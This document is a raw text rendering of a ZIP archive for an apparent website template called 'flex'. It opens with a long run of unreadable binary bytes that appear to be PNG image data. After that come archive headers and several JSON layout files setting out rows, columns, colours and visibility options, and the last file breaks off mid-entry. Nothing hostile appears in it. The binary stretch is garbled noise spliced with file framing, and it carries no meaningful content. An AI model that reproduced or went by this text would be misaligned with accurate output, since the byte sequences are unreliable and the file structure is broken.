.��e������V?�Z�O��La�>�O��5,��†VT�8
a��<��9�m��ʸ���hr�_��H�@����A����j�:�{�t����e3M#)���NaU�rł�A��<խ��6R)�d�^_�^��
>���}��ςV�q����z��XƲ���M�!����A���3[��S{�b�B�	�=��/ }���_�Aw��d��B��3^�^<b^c�_�(�6s����چ�q�"�:��X�Md�jq��-�5 }��T���n%�(�(�K���nRw/3v3'�G�׭Zm�P�L��z�ˑj��/[qm����3���R*z��j2��w\��L�FP�*4>Z�\*!\f��bc���Mc�u�O��@ʾ�D ;t��R�i>�E6�C"��_�j-�<Rg�p|�1t��XdыG���4����$�s�R�4}���:#���Cg}�O��Sdp�2�c98�Ű׌����\�d5�ӵ)��K�
��0A�*�Ʈ�dj�[^���ǯ�fw;��b4-,��u�[�=�eƐ��}<�_4ZU�ꋥL��jJ�/��:H�\�?s��~T�I�| ��T<J7�i���Eq[�a���[#��F>`�B/g�����2�t�A����Œ�U���B��c�e�y�9H��+`�
{��&����X4�5��ȟ2Cx$(c��*�����p���0h�Q:�r�9Ŷ��XǓ�Kj�.�����Z`%��lz[�S-l�c\�@��f�J.U�%�����y
+5�A���I2:2?�yJ����1��E�ʩ-��
��d+
��F]��o�P�ݠ��<t�p����|�n.��}:�g�8�ճ뛩`�.����a.��T�yş5�W��O��5��0������,���i��+7�(!�!�����G/p��;��R��#E�~hzY�݊˙z��%	�A�}��˅�>�w�ܽ\�T{�pBO��7n;�%y�S)��D��>�}������ͅ��|���G�n�_�k0��ˤbi]�@=l��ϩkm��1�Z���̼UW�(b"^0�,w�sP�ϙݣfzЪ9�:f7��OAS1^S^n���my����W�WR|?N3�:Xu��j�{)�:����:+ з�Yy87������zz�CNfBm�*�V�`��q��ElKl�"�VAJ`IG���v�"����R�=�f�8"�o�%� �8x3HK�r#�2�Q���*79��:ݘ�]�ߦ���@�]	�s�<��`��w�����{
;H�ff���&bs�n��y)�F�r��c��ǚ�1v��D��P�پˣ�C��`�G�,y�y��Q��F�p�����7�C�z-.��J럭_\���@��-�����^O�Q�̲�$�T	)�R��_"87��#�>E_½��_�fl�/Hr�Mh˛=j�n�v�����>^m�//-'�f���|i<x�~�~���r���f읥�����s�p���Be\�阪E���ul� �0�(��l���)6�rtR�kʉ>
}S:�#�T��[�p.���~�V����B���ଯ_�Crƥ��fl����?0�2��ؽD��
X4���	a��(���>ȸ��xu��/E#�������	cЕ�F�\�U��Ey.�{%�z�`Y#�of7��Q�����l��@��������0�;N���QO��:$���6��>��p8�������2�5^:����]�t�X��o���R��
�C��Q�������
"���Tƈ���I��
u�%Wj�y�wD�O)���D�tu�y}��G!xP�.$H|���P�ԥ�c�}�ݳFj{�ѹ�`��a`u�7�y�y��\�SV;V��#z+T�d"����t��
\dn\LC�[���Č�z��Ɉ��O�*%5�gY�ʀ���]H�Q���q��{&�D���۝Q����5J��?�
��0�����wn�#q�{s�x�?-�Ei�Vg��I׶��/�å��0�h���p�时�ʞ�]v8��&_}S���d*�[��� �v���blo�x���(�$��������r�cfƢ�OwVa��v`1s���
/��R-*l+X��r�~a�ڗɤ�$�M�d4e,ƥ]i�"dw�M*((V
u�QG��+��m�Fc�S��5q*
}xe%^V��Fp���i��}�G0��C�nMw�Z�g6m��p�D0�Ken�\I�L��V�U���=�@ �i�M-{�����Rq��Ն
��-�
>�aj�4��&H`pӘa=żi
�y�8c�^<��[�&{�Xq�ƍ�!h�Ka%b%�D��(
2Qi�b�
G�H�J��±��!��J�fz���/��Bo�v��lv���z�r�f��~�%�dR�phE�Z�-�����v1����2A~�q��fbDAH��n4�I7���4z�l�K.�J���$K��3�Qy�I}(���
��G���6��ب"���;ol��nwl��'Ʀ�C��?A�4�O��� H)����.���
z�V*4�q��́����2�8��1JP�*:i�#kZ�B��-���j�쥰���
V6m���_�0�?�J}+���K�T�VwB�0���a�$Pڭ�B�"ĭD����&ѕ���L'�%Z����Q,�z�;�(��Ii�K���-��#^�	A�IL�࣊q��v�&�H����_.$b��0�{ƯER���-o}�^/]�@͠�D����}g���n�џV�
�Chz�Eݩ��5@�W:���ĉ$�;l@��T�n��2U���'�g�]N� zJ��	H�o�{�wZ�U
J^Ja�W�����
�s��arUB"tc� ���V�Z�k�u���[���h�B�+/���W�l��5�ĴL��1Wwx�A[
W5}��ZA����D��όQ�	����Kk�<�O7���`ߖ@]��a���zH!+-0�7.�~ef��h�/�}�!�ҕs�;�aZ�y�O�8*-T�T	��`I�=���t?[��.�"n`��t!����gćv��IDAT�I���+�!g���03,*��A��0������Z��c�"� ��[˧[�N?'���N�2�&�Ӌ*����H,�%}%��捒��%�E�g��(���9�!N`5���@��Ar�A=���#7���>����K���i�!���Ey�z����:��r�K�ά���
¬��l��H�ۗ�P�)���Ѵa}Z��!��O#H�Ø.d�r�n9ЭZ���K������i�K1�����o__�+�TС��Ӌ�+�pXi`y�����r�r�H�Sg��cE���t��D}nD�0!}����f6�o���8F�-������kI����"X"wO�C�`���r�0��ke!&�
�6�hg�g�ZNU,�B��az;�"��t�$|M��QY���ي�a
�}��X
ܾ�JO�TC��p�o�i�x��1G�K�j*"vAς�4UU��f��#�}LzHH�)�Q:��(�����G9��,N�S!0H���Ƈ�y��������w�hw��l�
��~����n����k��p)��ܱ��RX����2��'�`FT0���܍J�xO'�)�
�0W���>��ef�uuO'������Da+]�.Nn�.�1o�3�z��c��YP�7�
_�}�I�jf�p�����2�,~j�a'[Ϊ.��k�2p��%U�U1���1Y]�>8C=F]���x\y{
���F�<���LY�_T�Lfe�U���yv����с��	�h���@z�}0��n2y�H��i+2T%#���%��̧����DedT
�#�!f퓄�A�nѠxk<��B��ooR�BН��9մ�@AF�MKr�ҁS��Q����qo*�D+��-gN^���pI���E��c��&�k㮎w��%��O)=:n8/��#�0�5b&ĵM�;ހ�NUܾc6���C��ث#�;Կ�f �Ž�����+e�B��L9�ވ�ƚ\��3�|W��q3;���{+�A���#�"���f�[�����&;l�., �b���H���E�V@8�/�����HWv���h��aUqc‰M�V�i����g����H½Y�j3>	�Խ��}{G]s`�;W,���A��d������[�y� ��FMr(B��`j�ڦ�DK�X#Ъ)8�픕����"
!ܨ#����ҧ�#|���S��P�R�rr\��`|W�W�z���5�֮S��>dԣ�4	~�|�Ep.`9z%�L;waN�ț6q#}��0� ��A��2yv��<���$�v��8�TPΕ+�f�U�Ả�$!��`��sQ�����,��0�Jgv���հ��C��$mm�7�08�x��'�{L�X'@���P�:����;�F��P��2�G�G������B_(����J&_YQ*/�v
�!9i���F�F��O��o��6�KC�����i�4�m=Wt'LO_L��رUe_ЦK˝ X�2�|AV�UQ@qV��F�fc�%&����X��a�e��k���G1ޠ�d��ԃ�1�5ה��?�;kȃ�.*��wHoH{@eX��S̚�X_�B�v��{��'El�ծ-���1)>z���J��N]Զ]G���]���!��n�A��5�7��o��)&�V$�rqG0�D��@�H����^S9��ϑ@P�������%p��,�- A���l�"����P�qj��g�?*��JR���2SAW�8�sS��M�c�n#����bC1�J��d.� ��f�d7��ho�(.f@�`l���.;�!��;G�Pd���l��!u6�ǂa�j��m���6��C_GF[{~(�u6�J���R@�^Pƥ����2��E������	f��B;	8��M�k�[���[2�
����f��y��N���8�'x�D�C����\P� �����t&����Ʃ�,�6�Т�m���4������?t��(�
��d��Q�*��,�����,�\o*��g���r�n\G}*N{�1jU뒤�W̃��S�G����"�hʤ��m�
��Z�(��s�t]O9:����tD���#��0���0l7�>Eu���[��ۖ#�d]�J�‘�g��u�|6�^�O0��t{�v�� 8
Vز�a_�+lK��-y�/���h�a9T=;"i\w�_J��Xa��&+���`����{:���$&��>�?���X	�s�Vb�z���5�!���R*�.�p�;^`�b5k�r0�c
�Q?�I5Q!E(_�*��ō�I�9�~lh���G�`C�e�g� �
t��B�@T��ߋ�)�>��֭A�T��0V?�鸢n�Olo!�D�‰S��Y�Q�>3QH<sK����d�5*��
�[ӑxtt5��'���Q)����0�.g�i� J`Pt/hu�F�}2x]}b�c�.�$���j#Pe��(�S����W�����*.�_��T�;�Z��iD�=(\�X�Z�ϫ��H��T��)I���8�a�ca�ݱD*:�Ǟ&3�UO�QSI�0"7v_��}�w��e�:E��yEr�E�@{�$옻u��:��L!�_����!�%���,�S'����.ol@F)`���("2�p��|@�l�h��0к�F 䵨,���C� 2X1�/.�0L��Kl[��'Xb?�;��C���~���F%��9����v�e?\,*��߮��u_̔,4�Nߙh�5A�"�����ȉ��mG�q"���m-~l{�c�:�c��K�8G1%�e�v��Q�+�ȭO���#����-��4Q?���u�
W�O\���P/��Bj�q�����M�&�|>����1��4U�@`��%�Jt�O�C��( ���a9�:;c]Գ��!1�!�]$-��ύ���t ����mۧ
��I�c]?/�t�$|)�@�ֵX����+�^�ΠԱVBQu��t�2�J?�~&�B��l=We����>��ᕹx�Fp%�>�i^6�71�/�d��t�����6�fl��O�D��%N~����!��+����y�/af�d��G�FB,,!05%�K����
b.z�=��L���.����g)
�Ƃb���C2��!o-�CM���Q�I �BҩG�����D���}����SY��e�AԎ�F���q[������P�Y�	�m��hr�����2�+�	�x�왁r�����G\�����P@����g�����QM���/�u
P�kv���
��_h�j�{��;(��� �_�X������AT�=�$��g�N��A;��5e����Y)C��\~���O/��j��/+�5�/K��h�hkqhעD��Z�bU]�0�+� �J�z;�%�Ǩ�)GRwspa7E�$�綉�c	9���Uhi���o�`��5�<Y��,��0�+R�]����x����?m��C2��J�;R���%}�����p�>�iw��+�����p�"Z�@�K4N�W�Qo@^m|K����#\~x�zG�c�O)�����m�\U�n�'+��	�r�
�7(�|۴( ,M�M�D����8�<C��sSV/.X�P׎�S;�Ƴ�ֳ�I:�E	�4��H$�(}%^J-�H�dZ�bp�,|}#�}�|$���WA����]�Ԍ�_�?wlkL��ƺ��!��E��;�D��1���Kt|���䠣�9��Q?f=��
/$��]����Wn�������d���
����ܴz/ilܦ@ty$(��/�Z�6��i�_�G)�}1��10�H!��* �<W
�j��K#��
���i\���K>F�y��"�N�����cI&��K����:[�cN1R�A���rL�k)�|>�~��]�����:�ߌ�Ι��Y��R����������d��n�u\��|�_>�eL�/��������'����Z�vocz�0#���6J���'�9�v��!�L��b1�a��A�nN���(B�ew�N���jښ=j��C��9�>*�!Z�m�`ͽL�3O��J����p�TR\��C��>��c�Q#���koN��:+��:�g��&���s,��af~eX�˙`\q�[���Ae$#�_�8v�\�>
�g{|��=����v�XJ!!��3��#���)i@�o�ۉ�[��KW�	�v�B	Ҽ�I����g9}އ���9�s�rxuܶ����Ѡ��
9(:��&�;�|�B�U'�)�G0�NV�m�xM򘱾��6O�K�	mO�I0/��L,e� Q�ˆ�����& S������un�:����Hb{���:~�a�a��5�خ�A�/J� ���aOBf���Nw�sD��+�mغ(��
!���N�ʥ���v���b�#��N��jğd�o�۱��8W�	��Ź��_I|;cb9��Ft�H��_@T�bfX=��T��R��jrA����XÕ
@�:��O����:1�e���_B�c���0&�����6�a*-S�MaQc!<�3KuN�a���R:�昖��/if�>�{$	T7����]��_y�
�Сܽ�o��?˭�ވ�@��ǭ����{t����+�]a\/�Ÿ%ZA���z^�=�f�߸�.�iW����q
V{-bw�h�bQ���4���m,n�j��`}f���~`q�:���.x�$Ҧ9hf��ցJVW���J����k�[�/
.�m��):��藦u&��vG�,1/���ډ�8_;'C��v۪�ar���4l�S�-Ԏ�ǎ�����;:˂�I7ꎎ9=��02��~m����4p=��q9�x�t�.�̀�ט^��'�mW>��9�Iz1e��L\�@�(�g_t��4MX�������L�R<l��ġ�f�r�;: �Vk������~A�Ź�p֚��$�u�t��m���=t+kVa��=8�6bG
��A�q�Q��kČ����:<ּ�uHF�`�-�z�rO��`O���C���F���Z#O����G���.�_��#@g*8���88�Ҍ�Nq�gʖ��VV�ŭlYY ��h=�}YS!��'�'��N�C߶ӧ�,ڙ��#�]�H���94��;+a���+�m��7Îgk�ҩ�"���RҺS���w%Z�<"Q��A���{��a����J��dž�"�It,�� ���3�)N–��<d�-M̜f>�]��R��}N��`��UG�W������I�X1o��H�f�	(���?�6���g���[�O�ӿo���ߦ���ɳO>Q�O>�ͳO~�����	���x���ߨ�����{�F���=^�-�������Oa�]�
��q����;��'����V���vp�y����i����:�[��K�pŎO����`u`V�L��O9���gg�	;z`�Q3y�������Z��G{�{g������i͕�������g�?:;�����#�/Y����_k�ǁ�~�>n������q��}�>n������q��}�>n������q��}����l�iE�[IEND�B`�PK!�e�
��flex/layout/flex-default.jsonnu&1i�[{"type":"row","layout":"48","settings":{"name":"Top Bar","background_color":"#3d3d3d","color":"#d4d4d4","background_image":"","background_repeat":"repeat","background_size":"inherit","background_attachment":"inherit","background_position":"50% 50%","link_color":"#b3b3b3","link_hover_color":"#d1d1d1","hidden_xs":0,"hidden_sm":0,"hidden_md":0,"padding":"5px 0 4px","margin":"","fluidrow":0,"custom_class":"","bg_position":"contain","bg_img_size":"cover","bg_repeat":"no-repeat","md_hidden":0,"ms_hidden":0,"xs_hidden":0,"text_color":"#ffffff","bg_image":"images/powered_by.png","bg_color":"#f02222"},"attr":[{"type":"sp_col","className":"layout-column col-sm-4","settings":{"sortableitem":"[object Object]","md_hidden":0,"ms_hidden":0,"xs_hidden":0,"custom_class":"mobile-centered","xs_col":"col-xs-12","sm_col":"col-sm-6","hidden_md":0,"hidden_sm":0,"hidden_xs":0,"name":"top1","column_type":0}},{"type":"sp_col","className":"layout-column col-sm-8","settings":{"sortableitem":"[object Object]","md_hidden":0,"ms_hidden":0,"xs_hidden":0,"custom_class":"pull-right","xs_col":"col-xs-12","sm_col":"col-sm-6","hidden_md":0,"hidden_sm":0,"hidden_xs":0,"name":"top2","column_type":0}}]},{"type":"row","layout":"381","settings":{"custom_class":"flex","fluidrow":0,"margin":"","padding":"","hidden_md":0,"hidden_sm":0,"hidden_xs":0,"link_hover_color":"#ffffff","link_color":"#ededed","background_size":"inherit","background_repeat":"repeat","background_image":"","color":"#f0f0f0","background_color":"#303030","name":"Header"},"attr":[{"type":"sp_col","className":"layout-column col-sm-3","settings":{"column_type":0,"name":"logo","hidden_xs":0,"hidden_sm":0,"hidden_md":0,"sm_col":"col-sm-10","xs_col":"col-xs-10","custom_class":"","xs_hidden":0,"ms_hidden":0,"md_hidden":0,"sortableitem":"[object Object]"}},{"type":"sp_col","className":"layout-column col-sm-8","settings":{"column_type":0,"name":"menu","hidden_xs":0,"hidden_sm":0,"hidden_md":0,"sm_col":"col-sm-1","xs_col":"col-xs-1","custom_class":"","xs_hidden":0,"ms_hidden":0,"md_hidden":0,"sortableitem":"[object Object]"}},{"type":"sp_col","className":"layout-column col-sm-1 column-active","settings":{"column_type":0,"name":"topsearch","hidden_xs":0,"hidden_sm":0,"hidden_md":0,"sm_col":"col-sm-1","xs_col":"col-xs-1","custom_class":"","sortableitem":"[object Object]"}}]},{"type":"row","layout":12,"settings":{"name":"Slider","background_color":"","color":"","background_image":"","link_color":"","link_hover_color":"","hidden_xs":0,"hidden_sm":0,"hidden_md":0,"padding":"","margin":"","fluidrow":1,"custom_class":""},"attr":[{"type":"sp_col","className":"layout-column col-sm-12","settings":{"column_type":0,"name":"slider","hidden_xs":0,"hidden_sm":0,"hidden_md":0,"sm_col":"","xs_col":"","custom_class":""}}]},{"type":"row","layout":12,"settings":{"background_repeat":"no-repeat","custom_class":"","fluidrow":1,"margin":"","padding":"","hidden_md":0,"hidden_sm":0,"hidden_xs":0,"link_hover_color":"","link_color":"","background_size":"cover","background_image":"","color":"","background_color":"","name":"Page Title","background_position":"100% 50%"},"attr":[{"type":"sp_col","className":"layout-column col-sm-12","settings":{"column_type":0,"name":"title","hidden_xs":0,"hidden_sm":0,"hidden_md":0,"sm_col":"","xs_col":"","custom_class":""}}]},{"type":"row","layout":"363","settings":{"name":"Main Body","background_color":"","color":"","background_image":"","link_color":"","link_hover_color":"","hidden_xs":0,"hidden_sm":0,"hidden_md":0,"padding":"","margin":"","fluidrow":0,"custom_class":"","md_hidden":0,"ms_hidden":0,"xs_hidden":0,"text_color":"","bg_image":"","bg_color":""},"attr":[{"type":"sp_col","className":"layout-column col-sm-3","settings":{"xs_col":"","sm_col":"","hidden_md":0,"hidden_sm":0,"hidden_xs":0,"column_type":0,"name":"left","xs_hidden":0,"ms_hidden":0,"md_hidden":0,"custom_class":"","sortableitem":"[object Object]"}},{"type":"sp_col","className":"layout-column col-sm-6","settings":{"column_type":1,"name":"","custom_class":"","md_hidden":0,"ms_hidden":0,"xs_hidden":0,"sortableitem":"[object Object]"}},{"type":"sp_col","className":"layout-column col-sm-3","settings":{"xs_col":"","sm_col":"","hidden_md":0,"hidden_sm":0,"hidden_xs":0,"custom_class":"","md_hidden":0,"ms_hidden":0,"xs_hidden":0,"name":"right","column_type":0,"sortableitem":"[object Object]"}}]},{"type":"row","layout":"3333","settings":{"name":"Bottom","background_color":"#f5f5f5","color":"","background_image":"","link_color":"","link_hover_color":"","hidden_xs":0,"hidden_sm":0,"hidden_md":0,"padding":"100px 0px","margin":"","fluidrow":1,"custom_class":""},"attr":[{"type":"sp_col","className":"layout-column col-sm-3","settings":{"column_type":0,"name":"bottom1","hidden_xs":0,"hidden_sm":0,"hidden_md":0,"sm_col":"col-sm-6","xs_col":"","custom_class":"","sortableitem":"[object Object]"}},{"type":"sp_col","className":"layout-column col-sm-3","settings":{"custom_class":"","xs_col":"","sm_col":"col-sm-6","hidden_md":0,"hidden_sm":0,"hidden_xs":0,"name":"bottom2","column_type":0}},{"type":"sp_col","className":"layout-column col-sm-3","settings":{"custom_class":"","xs_col":"","sm_col":"col-sm-6","hidden_md":0,"hidden_sm":0,"hidden_xs":0,"name":"bottom3","column_type":0}},{"type":"sp_col","className":"layout-column col-sm-3","settings":{"custom_class":"","xs_col":"","sm_col":"col-sm-6","hidden_md":0,"hidden_sm":0,"hidden_xs":0,"name":"bottom4","column_type":0}}]},{"type":"row","layout":12,"settings":{"custom_class":"","md_hidden":0,"ms_hidden":0,"xs_hidden":0,"link_hover_color":"#f0f0f0","link_color":"#d6d6d6","text_color":"","bg_image":"","bg_color":"","name":"Footer","background_color":"#363839","color":"#b0b0b0","background_image":"","hidden_xs":0,"hidden_sm":0,"hidden_md":0,"padding":"","margin":"","fluidrow":0},"attr":[{"type":"sp_col","className":"layout-column col-sm-12","settings":{"xs_col":"","sm_col":"","hidden_md":0,"hidden_sm":0,"hidden_xs":0,"column_type":0,"name":"footer1","xs_hidden":0,"ms_hidden":0,"md_hidden":0,"custom_class":"","sortableitem":"[object Object]"}}]}]PK!#hݖ��flex/layout/default.jsonnu&1i�[{"type":"row","layout":"48","settings":{"name":"Top Bar","background_color":"#3d3d3d","color":"#d4d4d4","background_image":"","background_repeat":"repeat","background_size":"inherit","background_attachment":"inherit","background_position":"50% 50%","link_color":"#b3b3b3","link_hover_color":"#d1d1d1","hidden_xs":0,"hidden_sm":0,"hidden_md":0,"padding":"","margin":"","fluidrow":0,"custom_class":"","bg_color":"#f02222","bg_image":"images/powered_by.png","text_color":"#ffffff","xs_hidden":0,"ms_hidden":0,"md_hidden":0,"bg_repeat":"no-repeat","bg_img_size":"cover","bg_position":"contain"},"attr":[{"type":"sp_col","className":"layout-column col-sm-4","settings":{"xs_col":"col-xs-12","sm_col":"col-sm-4","hidden_md":0,"hidden_sm":0,"hidden_xs":1,"xs_hidden":0,"ms_hidden":0,"md_hidden":0,"custom_class":"","name":"top1","column_type":0,"sortableitem":"[object Object]"}},{"type":"sp_col","className":"layout-column col-sm-8","settings":{"column_type":0,"name":"top2","custom_class":"pull-right","xs_hidden":0,"ms_hidden":0,"md_hidden":0,"hidden_xs":0,"hidden_sm":0,"hidden_md":0,"sm_col":"col-sm-8","xs_col":"col-xs-12","sortableitem":"[object Object]"}}]},{"type":"row","layout":"381","settings":{"name":"Header","background_color":"#303030","color":"#f0f0f0","background_image":"","background_repeat":"repeat","background_size":"inherit","link_color":"#ededed","link_hover_color":"#ffffff","hidden_xs":0,"hidden_sm":0,"hidden_md":0,"padding":"","margin":"","fluidrow":0,"custom_class":"flex"},"attr":[{"type":"sp_col","className":"layout-column col-sm-3 column-active","settings":{"sortableitem":"[object Object]","md_hidden":0,"ms_hidden":0,"xs_hidden":0,"custom_class":"","xs_col":"col-xs-9","sm_col":"col-sm-10","hidden_md":0,"hidden_sm":0,"hidden_xs":0,"name":"logo","column_type":0}},{"type":"sp_col","className":"layout-column col-sm-8","settings":{"sortableitem":"[object Object]","column_type":0,"name":"menu","hidden_xs":0,"hidden_sm":0,"hidden_md":0,"sm_col":"col-sm-1","xs_col":"col-xs-1","custom_class":"","md_hidden":0,"ms_hidden":0,"xs_hidden":0}},{"type":"sp_col","className":"layout-column col-sm-1","settings":{"sortableitem":"[object Object]","custom_class":"","xs_col":"col-xs-1","sm_col":"col-sm-1","hidden_md":0,"hidden_sm":0,"hidden_xs":0,"name":"topsearch","column_type":0}}]},{"type":"row","layout":12,"settings":{"custom_class":"","fluidrow":1,"margin":"","padding":"","hidden_md":0,"hidden_sm":0,"hidden_xs":0,"link_hover_color":"","link_color":"","background_image":"","color":"","background_color":"","name":"Slider"},"attr":[{"type":"sp_col","className":"layout-column col-sm-12","settings":{"custom_class":"","xs_col":"","sm_col":"","hidden_md":0,"hidden_sm":0,"hidden_xs":0,"name":"slider","column_type":0}}]},{"type":"row","layout":12,"settings":{"background_position":"100% 50%","name":"Page Title","background_color":"","color":"","background_image":"","background_size":"cover","link_color":"","link_hover_color":"","hidden_xs":0,"hidden_sm":0,"hidden_md":0,"padding":"","margin":"","fluidrow":1,"custom_class":"","background_repeat":"no-repeat"},"attr":[{"type":"sp_col","className":"layout-column col-sm-12","settings":{"custom_class":"","xs_col":"","sm_col":"","hidden_md":0,"hidden_sm":0,"hidden_xs":0,"name":"title","column_type":0}}]},{"type":"row","layout":"363","settings":{"bg_color":"","bg_image":"","text_color":"","xs_hidden":0,"ms_hidden":0,"md_hidden":0,"custom_class":"","fluidrow":0,"margin":"","padding":"","hidden_md":0,"hidden_sm":0,"hidden_xs":0,"link_hover_color":"","link_color":"","background_image":"","color":"","background_color":"","name":"Main Body"},"attr":[{"type":"sp_col","className":"layout-column col-sm-3","settings":{"sortableitem":"[object Object]","custom_class":"","md_hidden":0,"ms_hidden":0,"xs_hidden":0,"name":"left","column_type":0,"hidden_xs":0,"hidden_sm":0,"hidden_md":0,"sm_col":"","xs_col":""}},{"type":"sp_col","className":"layout-column col-sm-6","settings":{"sortableitem":"[object Object]","xs_hidden":0,"ms_hidden":0,"md_hidden":0,"custom_class":"","name":"","column_type":1}},{"type":"sp_col","className":"layout-column col-sm-3","settings":{"sortableitem":"[object Object]","column_type":0,"name":"right","xs_hidden":0,"ms_hidden":0,"md_hidden":0,"custom_class":"","hidden_xs":0,"hidden_sm":0,"hidden_md":0,"sm_col":"","xs_col":""}}]},{"type":"row","layout":"3333","settings":{"custom_class":"","fluidrow":1,"margin":"","padding":"100px 0px","hidden_md":0,"hidden_sm":0,"hidden_xs":0,"link_hover_color":"","link_color":"","background_image":"","color":"","background_color":"#f5f5f5","name":"Bottom"},"attr":[{"type":"sp_col","className":"layout-column col-sm-3","settings":{"sortableitem":"[object Object]","custom_class":"","xs_col":"","sm_col":"col-sm-6","hidden_md":0,"hidden_sm":0,"hidden_xs":0,"name":"bottom1","column_type":0}},{"type":"sp_col","className":"layout-column col-sm-3","settings":{"column_type":0,"name":"bottom2","hidden_xs":0,"hidden_sm":0,"hidden_md":0,"sm_col":"col-sm-6","xs_col":"","custom_class":""}},{"type":"sp_col","className":"layout-column col-sm-3","settings":{"column_type":0,"name":"bottom3","hidden_xs":0,"hidden_sm":0,"hidden_md":0,"sm_col":"col-sm-6","xs_col":"","custom_class":""}},{"type":"sp_col","className":"layout-column col-sm-3","settings":{"column_type":0,"name":"bottom4","hidden_xs":0,"hidden_sm":0,"hidden_md":0,"sm_col":"col-sm-6","xs_col":"","custom_class":""}}]},{"type":"row","layout":12,"settings":{"fluidrow":0,"margin":"","padding":"","hidden_md":0,"hidden_sm":0,"hidden_xs":0,"background_image":"","color":"#b0b0b0","background_color":"#363839","name":"Footer","bg_color":"","bg_image":"","text_color":"","link_color":"#d6d6d6","link_hover_color":"#f0f0f0","xs_hidden":0,"ms_hidden":0,"md_hidden":0,"custom_class":""},"attr":[{"type":"sp_col","className":"layout-column col-sm-12","settings":{"sortableitem":"[object Object]","custom_class":"","md_hidden":0,"ms_hidden":0,"xs_hidden":0,"name":"footer1","column_type":0,"hidden_xs":0,"hidden_sm":0,"hidden_md":0,"sm_col":"","xs_col":""}}]}]PK!���#flex/layout/header-transparent.jsonnu&1i�[{"type":"row","layout":"291","settings":{"custom_class":"transparent color","fluidrow":0,"margin":"","padding":"","hidden_md":0,"hidden_sm":0,"hidden_xs":0,"link_hover_color":"","link_color":"#ffffff","background_size":"cover","background_repeat":"repeat","background_image":"","color":"#ffffff","background_color":"","name":"Header"},"attr":[{"type":"sp_col","className":"layout-column col-sm-2","settings":{"md_hidden":0,"ms_hidden":0,"xs_hidden":0,"custom_class":"","xs_col":"col-xs-9","sm_col":"col-sm-10","hidden_md":0,"hidden_sm":0,"hidden_xs":0,"name":"logo","column_type":0,"sortableitem":"[object Object]"}},{"type":"sp_col","className":"layout-column col-sm-9 column-active","settings":{"column_type":0,"name":"menu","hidden_xs":0,"hidden_sm":0,"hidden_md":0,"sm_col":"col-sm-1","xs_col":"col-xs-1","custom_class":"","md_hidden":0,"ms_hidden":0,"xs_hidden":0,"sortableitem":"[object Object]"}},{"type":"sp_col","className":"layout-column col-sm-1","settings":{"column_type":0,"name":"topsearch","hidden_xs":0,"hidden_sm":0,"hidden_md":0,"sm_col":"col-sm-1","xs_col":"col-xs-1","custom_class":"","sortableitem":"[object Object]"}}]},{"type":"row","layout":12,"settings":{"name":"Slider","background_color":"","color":"","background_image":"","link_color":"","link_hover_color":"","hidden_xs":0,"hidden_sm":0,"hidden_md":0,"padding":"","margin":"","fluidrow":1,"custom_class":""},"attr":[{"type":"sp_col","className":"layout-column col-sm-12","settings":{"column_type":0,"name":"slider","hidden_xs":0,"hidden_sm":0,"hidden_md":0,"sm_col":"","xs_col":"","custom_class":""}}]},{"type":"row","layout":12,"settings":{"background_repeat":"no-repeat","custom_class":"","fluidrow":1,"margin":"","padding":"","hidden_md":0,"hidden_sm":0,"hidden_xs":0,"link_hover_color":"","link_color":"","background_size":"cover","background_image":"","color":"","background_color":"","name":"Title","background_position":"100% 50%"},"attr":[{"type":"sp_col","className":"layout-column col-sm-12","settings":{"column_type":0,"name":"title","hidden_xs":0,"hidden_sm":0,"hidden_md":0,"sm_col":"","xs_col":"","custom_class":""}}]},{"type":"row","layout":"363","settings":{"custom_class":"","md_hidden":0,"ms_hidden":0,"xs_hidden":0,"link_hover_color":"","link_color":"","text_color":"","bg_image":"","bg_color":"","name":"Main Body","background_color":"","color":"","background_image":"","hidden_xs":0,"hidden_sm":0,"hidden_md":0,"padding":"","margin":"","fluidrow":1},"attr":[{"type":"sp_col","className":"layout-column col-sm-3","settings":{"xs_col":"","sm_col":"","hidden_md":0,"hidden_sm":0,"hidden_xs":0,"column_type":0,"name":"left","xs_hidden":0,"ms_hidden":0,"md_hidden":0,"custom_class":"","sortableitem":"[object Object]"}},{"type":"sp_col","className":"layout-column col-sm-6","settings":{"column_type":1,"name":"","custom_class":"","md_hidden":0,"ms_hidden":0,"xs_hidden":0,"sortableitem":"[object Object]"}},{"type":"sp_col","className":"layout-column col-sm-3","settings":{"xs_col":"","sm_col":"","hidden_md":0,"hidden_sm":0,"hidden_xs":0,"custom_class":"","md_hidden":0,"ms_hidden":0,"xs_hidden":0,"name":"right","column_type":0,"sortableitem":"[object Object]"}}]},{"type":"row","layout":"3333","settings":{"name":"Bottom","background_color":"#f5f5f5","color":"","background_image":"","link_color":"","link_hover_color":"","hidden_xs":0,"hidden_sm":0,"hidden_md":0,"padding":"100px 0px","margin":"","fluidrow":0,"custom_class":""},"attr":[{"type":"sp_col","className":"layout-column col-sm-3","settings":{"column_type":0,"name":"bottom1","hidden_xs":0,"hidden_sm":0,"hidden_md":0,"sm_col":"col-sm-6","xs_col":"","custom_class":"","sortableitem":"[object Object]"}},{"type":"sp_col","className":"layout-column col-sm-3","settings":{"custom_class":"","xs_col":"","sm_col":"col-sm-6","hidden_md":0,"hidden_sm":0,"hidden_xs":0,"name":"bottom2","column_type":0}},{"type":"sp_col","className":"layout-column col-sm-3","settings":{"custom_class":"","xs_col":"","sm_col":"col-sm-6","hidden_md":0,"hidden_sm":0,"hidden_xs":0,"name":"bottom3","column_type":0}},{"type":"sp_col","className":"layout-column col-sm-3","settings":{"custom_class":"","xs_col":"","sm_col":"col-sm-6","hidden_md":0,"hidden_sm":0,"hidden_xs":0,"name":"bottom4","column_type":0}}]},{"type":"row","layout":12,"settings":{"custom_class":"","md_hidden":0,"ms_hidden":0,"xs_hidden":0,"link_hover_color":"#f0f0f0","link_color":"#d6d6d6","text_color":"","bg_image":"","bg_color":"","name":"Footer","background_color":"#363839","color":"#b0b0b0","background_image":"","hidden_xs":0,"hidden_sm":0,"hidden_md":0,"padding":"","margin":"","fluidrow":0},"attr":[{"type":"sp_col","className":"layout-column col-sm-12","settings":{"xs_col":"","sm_col":"","hidden_md":0,"hidden_sm":0,"hidden_xs":0,"column_type":0,"name":"footer1","xs_hidden":0,"ms_hidden":0,"md_hidden":0,"custom_class":"","sortableitem":"[object Object]"}}]}]PK!�'�		flex/layout/header-white.jsonnu&1i�[{"type":"row","layout":"381","settings":{"custom_class":"white","fluidrow":0,"margin":"","padding":"","hidden_md":0,"hidden_sm":0,"hidden_xs":0,"link_hover_color":"#808080","link_color":"#999999","background_size":"cover","background_repeat":"repeat","background_image":"","color":"","background_color":"","name":"Header"},"attr":[{"type":"sp_col","className":"layout-column col-sm-3 column-active","settings":{"sortableitem":"[object 